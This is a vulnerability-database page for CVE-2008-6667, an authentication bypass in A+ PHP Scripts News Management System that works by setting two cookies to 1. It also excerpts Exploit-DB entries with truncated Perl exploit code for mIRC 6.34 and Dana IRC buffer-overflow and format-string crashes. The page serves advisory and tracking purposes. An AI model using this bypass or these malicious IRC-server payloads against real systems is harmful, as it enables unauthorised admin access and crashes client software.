CVE-2008-6667
published 2009-04-08CVE-2008-6667: A+ PHP Scripts News Management System (NMS) allows remote attackers to bypass authentication and gain administrator privileges by setting the mobsuser and…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.56%
83.1th percentile
A+ PHP Scripts News Management System (NMS) allows remote attackers to bypass authentication and gain administrator privileges by setting the mobsuser and mobspass cookies to 1.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
mIRC 6.34 - Remote Buffer Overflow
exploitdb·2008-10-04
CVE-2008-4449 mIRC 6.34 - Remote Buffer Overflow
mIRC 6.34 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat hotmail com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
use IO::Socket;
if(!($ARGV[1]))
{
print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Use: mirc_exp.pl \n[x] Example: mirc_exp.pl 6667 0\n\n";
exit;
}
while(1)
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalA
Exploit-DB
mIRC 6.34 - Remote Buffer Overflow (PoC)
exploitdb·2008-10-02
CVE-2008-4449 mIRC 6.34 - Remote Buffer Overflow (PoC)
mIRC 6.34 - Remote Buffer Overflow (PoC)
---
##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;
sub sock()
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'); die unless $sock;
print " [+]IRC Server started on port 6667 \r\n";
$s=$sock->accept();
$a = "A" x 313;
$twobytes = "\x43\x43";
print " [+]Sending pickles\r\n";
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG yow : /FINGER yow.\r\n";
Exploit-DB
A+ PHP Scripts - Nms Insecure Cookie Handling
exploitdb·2008-06-26
CVE-2008-6667 A+ PHP Scripts - Nms Insecure Cookie Handling
A+ PHP Scripts - Nms Insecure Cookie Handling
---
####################################################################################################
# #
# ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... #
###################################################################################################
Virangar Security Team
www.virangar.net
www.virangar.ir
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
DESCRIPTION:
A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cook
Exploit-DB
Dana IRC 1.3 - Remote Buffer Overflow (PoC)
exploitdb·2008-06-14
CVE-2008-2922 Dana IRC 1.3 - Remote Buffer Overflow (PoC)
Dana IRC 1.3 - Remote Buffer Overflow (PoC)
---
- Dana IRC new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 );
$jnk = "%n"x1000;
print "Running..";
while($client = $sock->accept()) {
print $client "$jnk\r\n";
print "Crashed Client!\n";
}
# milw0rm.com [2008-06-14]
No writeups or analysis indexed.
2009-04-08
Published